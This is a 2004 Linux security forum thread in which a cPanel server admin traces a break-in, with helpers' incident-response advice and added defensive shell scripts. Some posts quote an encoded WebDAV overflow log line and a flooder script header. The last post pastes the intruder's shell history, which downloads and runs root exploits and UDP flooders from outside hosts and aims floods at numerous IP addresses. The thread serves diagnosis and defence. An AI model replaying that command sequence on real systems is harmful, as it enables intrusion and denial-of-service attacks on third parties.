LinuxQuestions.org

Linux - Security forum thread: Server Attack...every day, help:( (https://www.linuxquestions.org/questions/linux-security-4/server-attack-every-day-help-205751/)

xmanxl 07-16-2004 05:19 AM

Server Attack...every day, help:(
 
Hello,
Every day somebody attacks my server, puts some files in my /var/tmp and /tmp/ directories and executes them (on my server I have cPanel/WHM). I searched the logs (usr/local/apache/domlogs and var/log) for how he does that but I can't find it; the only thing I found today in domlogs is this code. What is this, can he do that with this code, and how can I protect my server if he does it with this code:
66.79.55.12 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\x
.
.
etc.
etc.
etc.
much more...and at end of this code is this:
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 354 "-"
"-"

Please somebody help me...this is big problem for me.
Thanks!
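An added example, not from the thread: Apache writes non-printable bytes in the request line as \xHH escapes, so a single awk pass can tag entries like the one above by method, escape count and status. The client addresses and the two shortened log lines are constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Per access-log entry it prints: client,
# method, status, number of \xHH escapes in the request line, and triage tags:
#   webdav-method  - SEARCH/PROPFIND/... are WebDAV verbs, not normal browsing
#   binary-payload - many \xHH escapes: a binary blob was sent as the URI
#   rejected       - 4xx status: Apache refused it (414 = Request-URI Too Long)

triage_access_log() {                  # reads combined-format log lines on stdin
    awk '
    {
        split($0, q, "\"")             # q[2] = request line, q[3] = " status bytes "
        req = q[2]
        split(req, r, " ")
        method = r[1]
        split(q[3], rest, " ")
        status = rest[1]
        n = gsub(/\\x[0-9a-fA-F][0-9a-fA-F]/, "&", req)   # count escapes, keep text
        tags = ""
        if (method ~ /^(SEARCH|PROPFIND|PROPPATCH|MKCOL|LOCK|UNLOCK)$/) tags = tags "webdav-method,"
        if (n >= 16)        tags = tags "binary-payload,"
        if (status ~ /^4/)  tags = tags "rejected,"
        if (tags == "")     tags = "normal,"
        sub(/,$/, "", tags)
        print $1, method, status, n, tags
    }'
}

# Constructed sample: a shortened entry of the kind posted above (the 0x90 and
# 0x02 0xb1 filler is what the thread shows), followed by an ordinary request.
SAMPLE_LOG='203.0.113.5 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90" 414 354 "-" "-"
203.0.113.9 - - [16/Jul/2004:07:30:01 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"'

printf '%s\n' "$SAMPLE_LOG" | triage_access_log
```

A SEARCH request full of escaped bytes that Apache answered with 414 never reached any handler; the real question for the /var/tmp files is what else the same client, or a local user, did.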

ppuru 07-16-2004 06:23 AM

The best thing you can do is back up your important config files and web pages, format and reinstall the OS.

Read through the security refs on this forum to harden your OS. Ensure you connect your system to the net only after it is properly patched up and the firewall has opened only the ports that you need for your Internet presence.

xmanxl 07-16-2004 06:43 AM

But I checked my system with chkrootkit, rkhunter and with Panda free antivirus software and I didn't find trojans, viruses...nothing...

Some other way?

Thanks

stickman 07-16-2004 07:33 AM

Looks like the Apache log entry is an IIS WebDAV exploit, and it's probably not related to the files in /var/tmp or /tmp. What are the files in those directories? I wouldn't go so far as re-installing unless you know that you have a problem that can't be easily undone.

xmanxl 07-16-2004 07:55 AM

No, I don't use IIS; on my server I use Linux/Apache....
Every day he puts and executes in var/tmp files named "vadimI", "f3", "sh" and some more names...I have a copy of those files on my HD...those files use much CPU...
Also, he creates directories in var/tmp with names like "....", ".c", ".x"....

But I can't find those files in the logs: how he runs them, how he copies them to that location....?

Capt_Caveman 07-16-2004 09:25 AM

First, you should definitely disconnect the system from the internet.

As stickman pointed out, the buffer overflow you've posted is a common IIS WebDAV exploit and is likely unrelated to the files. In fact, if the files are appearing every day, it sounds like they're being created locally by a cron job or something in the init process if you're rebooting daily, so definitely take a look at cron and crontab. You should probably also take a look at the /etc/passwd file and see if you have any odd users and especially look for users other than root with a UID of 0. Try searching for strange SUID files (find / -perm -4000 -print) and SGID files (find / -perm -2000 -print) as well.

One thing to keep in mind is that rootkits are really only tools used primarily to hide the presence of a cracker. So it's entirely possible to crack a system and never use a rootkit at all; it just makes the job of hiding a little easier.

Even if you do determine that the system has been cracked, remove the files and prevent their re-creation, you will need to re-install from trusted media. If the system's security has been compromised, it's extremely difficult to be sure that no other files are lurking somewhere else in the file system. When you re-install, look into running a file integrity IDS like tripwire, aide, samhain, etc. With one of these installed, you'll more than likely be able to determine what files have been added to the system or if any critical files have been altered, using a single command.
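The three host checks suggested in this post, written up as an added example (not the poster's or cPanel's code) as small shell functions run against constructed sample files: the account name, paths and cron lines are made up for the test.

```shell
#!/bin/sh
# Added example, not from the thread: odd UID-0 accounts, new SUID/SGID files
# against a baseline, and cron jobs that run out of tmp, on constructed input.

# Any account besides root with UID 0 is a second root login.
uid0_non_root() {                       # $1 = passwd-format file
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Set-UID/set-GID paths present now but absent from a known-good baseline.
# On a live host the current listing would come from
#   find / -xdev \( -perm -4000 -o -perm -2000 \) -print
# and the baseline from a clean install with the same packages.
new_privileged_files() {                # $1 = current listing, $2 = baseline listing
    work=$(mktemp -d)
    sort -u "$1" > "$work/cur"
    sort -u "$2" > "$work/base"
    comm -23 "$work/cur" "$work/base"   # lines only in the current listing
    rm -rf "$work"
}

# Cron entries whose command references /tmp or /var/tmp (comments and blank lines skipped).
cron_runs_from_tmp() {                  # $1 = crontab-format file
    grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -E '(^|[[:space:]])(/var)?/tmp/'
}

# --- constructed sample input; the account, paths and cron lines are made up ---
SAMPLE_HOST=$(mktemp -d)
trap 'rm -rf "$SAMPLE_HOST"' EXIT
cat > "$SAMPLE_HOST/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
toor:x:0:0::/var/tmp/.x:/bin/bash
EOF
cat > "$SAMPLE_HOST/suid.baseline" <<'EOF'
/bin/su
/usr/bin/passwd
/usr/bin/crontab
EOF
cat > "$SAMPLE_HOST/suid.now" <<'EOF'
/bin/su
/usr/bin/passwd
/usr/bin/crontab
/var/tmp/.x/sh
EOF
cat > "$SAMPLE_HOST/crontab" <<'EOF'
# constructed system crontab
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim retry > /dev/null 2>&1
*/5 * * * * /usr/bin/perl /var/tmp/.x/udp.pl > /dev/null 2>&1
EOF

echo "UID 0 accounts other than root:";  uid0_non_root "$SAMPLE_HOST/passwd"
echo "SUID/SGID files not in baseline:"; new_privileged_files "$SAMPLE_HOST/suid.now" "$SAMPLE_HOST/suid.baseline"
echo "Cron entries running from tmp:";   cron_runs_from_tmp "$SAMPLE_HOST/crontab"
```

Remember to look at every user's crontab (/var/spool/cron on Red Hat-style systems) as well as /etc/crontab and /etc/cron.*, since the post's "crontab -e" shows only root's.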

xmanxl 07-16-2004 12:40 PM

I think that I found where the problem is!
In the "/etc/cron.daily" dir I found these files:
00-logwatch@
logrotate*
rpm*
0anacron*
makewhatis.cron*
slocate.cron*
tmpwatch*

Is this normal? Do you have tmpwatch* ?
When I edit that file I find this:
/usr/sbin/tmpwatch 240 /tmp
/usr/sbin/tmpwatch 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
if [ -d "$d" ]; then
/usr/sbin/tmpwatch -f 720 $d
fi
done

When I search on google "tmpwatch" first result is:
"tmpwatch has a local denial of service and root exploit"

Is this the problem?
What now?:(

Capt_Caveman 07-17-2004 01:14 AM

The contents of cron.daily are pretty normal, except the * and @ characters after the filenames; what linux distro are you using? Also, don't forget to check crontab as well.

Tmpwatch is a normal linux application which is used to blow away tmp files that aren't being used. For more info, checkout the tmpwatch man page.

Have you looked into any of the other advice I've given?

xmanxl 07-17-2004 01:45 PM

Today he added and ran a new file in var/tmp, "udp.pl"!
Also, this uses much CPU; when I click on "CPU/Memory/MySQL Usage" in WHM I see this:
Top Process %CPU 89.0 /usr/bin/perl ./udp.pl 200.222.175.87 139 1

Here is a copy of the header (udp.pl):
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

Also, how does he run this script? For other scripts like ikonboard I see this for the same user:
Top Process %CPU 67.0 /usr/bin/perl ikonboard.cgi

no "./ikonboard.cgi"!!!

Here is crontab -e output:
2,58 * * * * /usr/local/bandmin/bandmin
0 0 * * * /usr/local/bandmin/ipaddrmap
31 5 * * * /scripts/upcp
*/15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
0 6 * * * /scripts/cleanmsglog > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim callout > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim retry > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim reject > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim wait-remote_smtp > /dev/null 2>$
*/5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1

etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash

and the users are all "username:x:3xxxx:3xxxx::/home..."
(xxxx is some number)

find / -perm -4000 -print:
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/quota
/usr/bin/crontab
/usr/bin/lppasswd
/usr/local/apache/bin/suexec
/usr/local/cpanel/bin/cpwrap
/usr/local/cpanel/bin/jailshell
/usr/local/cpanel/cgi-sys/scgiwrap
/usr/sbin/exim
/usr/sbin/traceroute
/usr/sbin/suexec
/bin/su
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/24270/fd/4: No such file or directory
find: /proc/24586/fd: No such file or directory

find / -perm -2000 -print:
/var/cpanel/users
/usr/bin/wall
/usr/bin/slocate
/usr/local/cpanel/3rdparty/mailman
/usr/local/cpanel/3rdparty/mailman/Mailman
/usr/local/cpanel/3rdparty/mailman/Mailman/Archiver
/usr/local/cpanel/3rdparty/mailman/Mailman/Bouncers
/usr/local/cpanel/3rdparty/mailman/Mailman/Cgi
/usr/local/cpanel/3rdparty/mailman/Mailman/Handlers
/usr/local/cpanel/3rdparty/mailman/Mailman/Logging
/usr/local/cpanel/3rdparty/mailman/Mailman/Queue
/usr/local/cpanel/3rdparty/mailman/Mailman/MTA
/usr/local/cpanel/3rdparty/mailman/Mailman/Gui
/usr/local/cpanel/3rdparty/mailman/Mailman/Commands
/usr/local/cpanel/3rdparty/mailman/archives
/usr/local/cpanel/3rdparty/mailman/archives/private
/usr/local/cpanel/3rdparty/mailman/archives/private/aa_cpanel3.darkorb.net.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman
/usr/local/cpanel/3rdparty/mailman/archives/public
/usr/local/cpanel/3rdparty/mailman/bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/handle_opts
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
/usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
/usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
/usr/local/cpanel/3rdparty/mailman/cgi-bin/options
/usr/local/cpanel/3rdparty/mailman/cgi-bin/private
/usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
/usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
/usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
/usr/local/cpanel/3rdparty/mailman/cron
/usr/local/cpanel/3rdparty/mailman/data
/usr/local/cpanel/3rdparty/mailman/filters
/usr/local/cpanel/3rdparty/mailman/icons
/usr/local/cpanel/3rdparty/mailman/lists
/usr/local/cpanel/3rdparty/mailman/lists/mailman
/usr/local/cpanel/3rdparty/mailman/locks
/usr/local/cpanel/3rdparty/mailman/logs
/usr/local/cpanel/3rdparty/mailman/mail
/usr/local/cpanel/3rdparty/mailman/mail/mailman
/usr/local/cpanel/3rdparty/mailman/qfiles
/usr/local/cpanel/3rdparty/mailman/qfiles/virgin
/usr/local/cpanel/3rdparty/mailman/qfiles/bounces
/usr/local/cpanel/3rdparty/mailman/qfiles/shunt
/usr/local/cpanel/3rdparty/mailman/qfiles/commands
/usr/local/cpanel/3rdparty/mailman/qfiles/archive
/usr/local/cpanel/3rdparty/mailman/qfiles/in
/usr/local/cpanel/3rdparty/mailman/qfiles/out
/usr/local/cpanel/3rdparty/mailman/qfiles/news
/usr/local/cpanel/3rdparty/mailman/qfiles/retry
/usr/local/cpanel/3rdparty/mailman/scripts
/usr/local/cpanel/3rdparty/mailman/spam
/usr/local/cpanel/3rdparty/mailman/templates
/usr/local/cpanel/3rdparty/mailman/templates/big5
/usr/local/cpanel/3rdparty/mailman/templates/cs
/usr/local/cpanel/3rdparty/mailman/templates/de
/usr/local/cpanel/3rdparty/mailman/templates/en
/usr/local/cpanel/3rdparty/mailman/templates/es
/usr/local/cpanel/3rdparty/mailman/templates/et
/usr/local/cpanel/3rdparty/mailman/templates/eu
/usr/local/cpanel/3rdparty/mailman/templates/fi
/usr/local/cpanel/3rdparty/mailman/templates/fr
/usr/local/cpanel/3rdparty/mailman/templates/gb
/usr/local/cpanel/3rdparty/mailman/templates/hu
/usr/local/cpanel/3rdparty/mailman/templates/it
/usr/local/cpanel/3rdparty/mailman/templates/ja
/usr/local/cpanel/3rdparty/mailman/templates/ko
/usr/local/cpanel/3rdparty/mailman/templates/lt
/usr/local/cpanel/3rdparty/mailman/templates/nl
/usr/local/cpanel/3rdparty/mailman/templates/no
/usr/local/cpanel/3rdparty/mailman/templates/pl
/usr/local/cpanel/3rdparty/mailman/templates/pt
/usr/local/cpanel/3rdparty/mailman/templates/pt_BR
/usr/local/cpanel/3rdparty/mailman/templates/ru
/usr/local/cpanel/3rdparty/mailman/templates/sr
/usr/local/cpanel/3rdparty/mailman/templates/sv
/usr/local/cpanel/3rdparty/mailman/templates/uk
/usr/local/cpanel/3rdparty/mailman/templates/ca
/usr/local/cpanel/3rdparty/mailman/templates/hr
/usr/local/cpanel/3rdparty/mailman/templates/ro
/usr/local/cpanel/3rdparty/mailman/templates/sl
/usr/local/cpanel/3rdparty/mailman/templates/tr
/usr/local/cpanel/3rdparty/mailman/pythonlib
/usr/local/cpanel/3rdparty/mailman/pythonlib/email
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/python
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/c
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/japanese/aliases
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2
/usr/local/cpanel/3rdparty/mailman/pythonlib/lib/python2.2/site-packages
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/mappings
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/c
/usr/local/cpanel/3rdparty/mailman/pythonlib/korean/python
/usr/local/cpanel/3rdparty/mailman/messages
/usr/local/cpanel/3rdparty/mailman/messages/cs
/usr/local/cpanel/3rdparty/mailman/messages/cs/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/da
/usr/local/cpanel/3rdparty/mailman/messages/da/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/de
/usr/local/cpanel/3rdparty/mailman/messages/de/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/es
/usr/local/cpanel/3rdparty/mailman/messages/es/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/et
/usr/local/cpanel/3rdparty/mailman/messages/et/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/eu
/usr/local/cpanel/3rdparty/mailman/messages/eu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fi
/usr/local/cpanel/3rdparty/mailman/messages/fi/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/fr
/usr/local/cpanel/3rdparty/mailman/messages/fr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hu
/usr/local/cpanel/3rdparty/mailman/messages/hu/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/it
/usr/local/cpanel/3rdparty/mailman/messages/it/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ja
/usr/local/cpanel/3rdparty/mailman/messages/ja/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ko
/usr/local/cpanel/3rdparty/mailman/messages/ko/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/lt
/usr/local/cpanel/3rdparty/mailman/messages/lt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/nl
/usr/local/cpanel/3rdparty/mailman/messages/nl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/no
/usr/local/cpanel/3rdparty/mailman/messages/no/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pl
/usr/local/cpanel/3rdparty/mailman/messages/pl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt
/usr/local/cpanel/3rdparty/mailman/messages/pt/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR
/usr/local/cpanel/3rdparty/mailman/messages/pt_BR/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ru
/usr/local/cpanel/3rdparty/mailman/messages/ru/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sr
/usr/local/cpanel/3rdparty/mailman/messages/sr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sv
/usr/local/cpanel/3rdparty/mailman/messages/sv/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/uk
/usr/local/cpanel/3rdparty/mailman/messages/uk/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ca
/usr/local/cpanel/3rdparty/mailman/messages/ca/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/hr
/usr/local/cpanel/3rdparty/mailman/messages/hr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/ro
/usr/local/cpanel/3rdparty/mailman/messages/ro/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/sl
/usr/local/cpanel/3rdparty/mailman/messages/sl/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/messages/tr
/usr/local/cpanel/3rdparty/mailman/messages/tr/LC_MESSAGES
/usr/local/cpanel/3rdparty/mailman/tests
/usr/local/cpanel/3rdparty/mailman/tests/bounces
/usr/local/cpanel/3rdparty/mailman/tests/msgs
/usr/local/cpanel/3rdparty/mailman/suspended.lists
/usr/local/cpanel/3rdparty/phpMyAdmin
/usr/local/cpanel/3rdparty/phpMyAdmin/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/images
/usr/local/cpanel/3rdparty/phpMyAdmin/images/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/lang
/usr/local/cpanel/3rdparty/phpMyAdmin/lang/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries
/usr/local/cpanel/3rdparty/phpMyAdmin/libraries/CVS
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts
/usr/local/cpanel/3rdparty/phpMyAdmin/scripts/CVS
/usr/sbin/sendmail
/usr/sbin/utempter
/etc/proftpd
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/25154/fd/4: No such file or directory


That is all...something bad?

Thank you very much...

Capt_Caveman 07-17-2004 02:44 PM

Well it's pretty clear that the system has been cracked. VadimI and udp.pl are flooders used in DoS attacks. Since new files were uploaded, I'm guessing that you have not taken the system offline. Let me be clear about this:

Your system is being used to attack other computers. You MUST take it offline NOW and leave it offline until you are sure that it is clean!

In fact, if you look at the process you've listed, you can see the IP address of the system you're being used to attack.

Capt_Caveman 07-17-2004 03:08 PM

Get a listing of all currently running processes and check the integrity of rpms with rpm -Va. Once you've got the system offline, you can either remove the compromised system's hard drive, replace it with a new one, then format and re-install from trusted media, or you can make an image of the drive using something like dd, then wipe the compromised drive by completely re-formatting and re-installing from trusted media (not from a backup). You can then get the system back online. I would HIGHLY recommend you spend some time properly securing the system before putting it back online, otherwise you'll probably be doing this again sometime soon.

If you want to do any kind of further analysis, boot your system with a cd-rom based linux distro like knoppix or FIRE and then mount the compromised hd read-only. You can then take a look at the filesystem, system logs, and root's bash_history. You might also want to take a look at the ikonboard.cgi file (ikonboard is a bulletin board app), especially if you are not running ikonboard. Btw, you said both ikonboard and udp.pl were running under the same user, but you never said what user that is.

xmanxl 07-17-2004 03:44 PM

Big problem, that is a BIG PROBLEEEEM....offline, f***...

Yes...user...he runs it every time with the same username (one site) and every time in "var/tmp"; before I ran "scripts/securetmp" he ran it in "tmp"!!!
But THAT SITE IS MY SITE!! Yes, I changed the password, that didn't help!
In the logs for that site I can't find anything!

Also, I can't remove the HD, the server is not mine, I pay a company for that server...
But I have many sites on that server....and some of those sites are not mine!
How long must the server be offline, and can I restore all accounts and data for all sites?

This can be a big problem, somebody could think that I attacked those servers...and I could lose this server from this company!

Also, yes, I use ikonboard board!

Capt_Caveman 07-17-2004 04:23 PM

Have you tried looking at the user's bash history or just removing the user entirely? Have you contacted the user and asked him wtf he's doing?

FWIW, /var/tmp is often writable to normal users (check /var/tmp permissions) and if you allow normal users to have access to /usr/sbin/perl, they'll be able to run that udp.pl script without needing root access.

sh1ft 07-17-2004 06:22 PM

Let this be a lesson to people to make your /tmp and /var directories on a separate partition and add the noexec flag to fstab. That will stop a heck of a lot of script kiddies in their tracks.
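An added example, not from the thread, that audits fstab entries for /tmp and /var/tmp against the noexec option sh1ft recommends, plus nosuid and nodev, which belong on any user-writable filesystem; the fstab below is constructed.

```shell
#!/bin/sh
# Added example, not from the thread: report /tmp and /var/tmp mounts whose
# options lack noexec/nosuid/nodev and print the corrected option string.

# Per matching fstab entry prints: mountpoint, "ok" or "missing:<opts>", options to use.
audit_tmp_mounts() {                    # $1 = fstab-format file
    awk '
    /^[ \t]*#/ || NF == 0 { next }              # skip comments and blank lines
    $2 == "/tmp" || $2 == "/var/tmp" {
        m = split("noexec nosuid nodev", want, " ")
        missing = ""; fixed = $4
        for (i = 1; i <= m; i++)
            if (index(("," $4 ","), ("," want[i] ",")) == 0) {
                missing = missing want[i] ","
                fixed = fixed "," want[i]
            }
        if (missing == "") print $2, "ok", $4
        else { sub(/,$/, "", missing); print $2, "missing:" missing, fixed }
    }' "$1"
}

# Constructed fstab: /tmp mounted with defaults only, /var/tmp already hardened.
SAMPLE_FSTAB=$(mktemp)
trap 'rm -f "$SAMPLE_FSTAB"' EXIT
cat > "$SAMPLE_FSTAB" <<'EOF'
# constructed /etc/fstab
LABEL=/        /          ext3   defaults                      1 1
LABEL=/tmp     /tmp       ext3   defaults                      1 2
LABEL=/vartmp  /var/tmp   ext3   defaults,noexec,nosuid,nodev  1 2
EOF

audit_tmp_mounts "$SAMPLE_FSTAB"
# After editing fstab, the live mount is tightened without a reboot by
#   mount -o remount,noexec,nosuid,nodev /tmp
```

noexec stops the chmod +x / ./file pattern, but a script handed to an interpreter, like the /usr/bin/perl ./udp.pl process shown earlier in the thread, still runs, so this complements the cron and process checks rather than replacing them.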

xmanxl 07-17-2004 09:25 PM

Yes, yes yes.....I found it, I found it......in ".bash_history" for this account I found this:
kill
29515 kill 29515
kill 29515
ls
ls
cd /tmp
ls
rm *
ls
cd /var/tmp
ls
uanem -a
uname -a
wget http://www.kpteam.org/xpl/w00t.zip
unzip http://www.kpteam.org/xpl/w00t.zip
unzip w00t.zip
chmod +x w00t
./w00t
id
wget http://www.rootthief.com/binarys/mremap_pte
chmod +x mremap_pte
./mremap_pte
id
wget http://www.rootthief.com/binarys/NmapYa
chmod +x NmapYa
./NmapYa
id
nmap
./ NmapYa
wget http://www.rootthief.com/binarys/cvs
chmod +x cvs
./cvs
./cvs
./cvs forum.aboutpc.net
ls
rm *
ls
wget http://www.rootthief.com/binarys/ptrace
chmod +x ptrace
./ptrace
id
./ptrace; id
ls
ps
kill 23425
rm *
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
rm vadimI.zip
chmod +x vadimI
./vadimI
./vadimI 200.214.14.71 80 200.214.14.7
ps
kill 27391
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x f3
ls
./vadimI 200.164.65.34 80 200.164.65.3
./f3 200.216.161.140 10000 200
ps
kill 31240
ps
ps
ps
ps
ps
ps
kill -9 31239
kill -9 31240
ps
./f3 161.24.72.80
./f3 161.24.72.80 1000 200
id
ps
./vadimI 200.216.161.140 59 200.216.161.14
w
w
ls
id
uname -a
wget http://www.portalsecurityall.hpg.ig.com.br/exploits/PT
chmod +x PT
./PT
id
rm PT
exit
wget http://www.portalsecurityall.hpg.ig....3.10ALPHA7.tgz
ls
rm -rf nmap-3.10ALPHA7.tgz
ls
wget http://www.malukinhow.com/mirc615.exe
ls
rm -rf mirc615.exe
ls
id
ls
ps
./f3
w
ls
./vadimI 200.165.49.5 80 200.165.49.1
ps
ls
./f3
./f3 200.247.39.196
./f3 200.247.39.196 1000 600
id
./f3 200.247.39.196 1000 600
ls
ps
kill 18353
kill 18354
kill 19787
ls
ps
kill -9 18354
kill -9 18353
ps
./f3 200.247.39.196 1000 600
ps
kill -9 21132
ps
./f3 66.90.87.13 1000 600
ps
kill -9 21911
./vadimI 66.90.87.13 1286 66.90.87.1
w
ls
ls -a
ps
exit
ls
ls -a
mkdir ....
cd ....
ls
ls
pwd
w
wget http://www.aloysio.hpg.ig.com.br/f3
wget http://geocities.yahoo.com.br/mat_ad0r/vadimI.zip
unzip vadimI.zip
chmod +x *
ls
rm -rf vadimI.zip
id
./f3
./f3 200.154.201.39 1000 200
ls
ls -a
cd ....
./f3 200.154.201.39 1000 200
id
ps
cd ....
ls
./vadimI 66.45.239.202 6005 66.45.239.20
id
./vadimI 66.45.239.202 6005 66.45.239.20
ps
./f3 201.7.10.73 1000 40
cd ....
./f3 201.7.10.73 1000 40
./vadimI 201.7.10.73 139 201.7.10.73
ps
kill 291243
kill 29124
ps
cd ...
cd ....
./f3 201.7.10.73 10000 100
ps
kill -9 29558
ps
ls
cd ....
./vadimI 200.158.190.101 2004 200.158.190.10
ls
cd ....
ls
ls -a
ps
mkdir .i
cd .i
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
ls
./f3
./f3 201.7.89.160 1000 100
ls
wget http://www.enzotech.net/code/neuter.c
ps
kill 15818
ps
w
ls
cd .i
ls
./f3 200.222.176.13 100 10
ls
cd .i
ls
./f3 200.180.52.203 200 300
./f3 200.180.52.203 1000 200
lynx
ls
lynx http://www.rootthief.com/binarys/mremap_pte
w
ls
pwd
cd ....
ls -a
mkdir ...
cd ...
ls
wget http://www.aloysio.hpg.ig.com.br/f3
chmod +x *
./f3
./f3 200.140.88.186 500 300
ps
w
ls -a
pwd
mkdir .s
cd .s
wget http://www.aloysio.hpg.ig.com.br/f3
ls
ls -a
cd .s
ls
ps
kill 21493
ps
wget http://www.aloysio.hpg.ig.com.br/f3
./f3 200.228.76.178 500 180
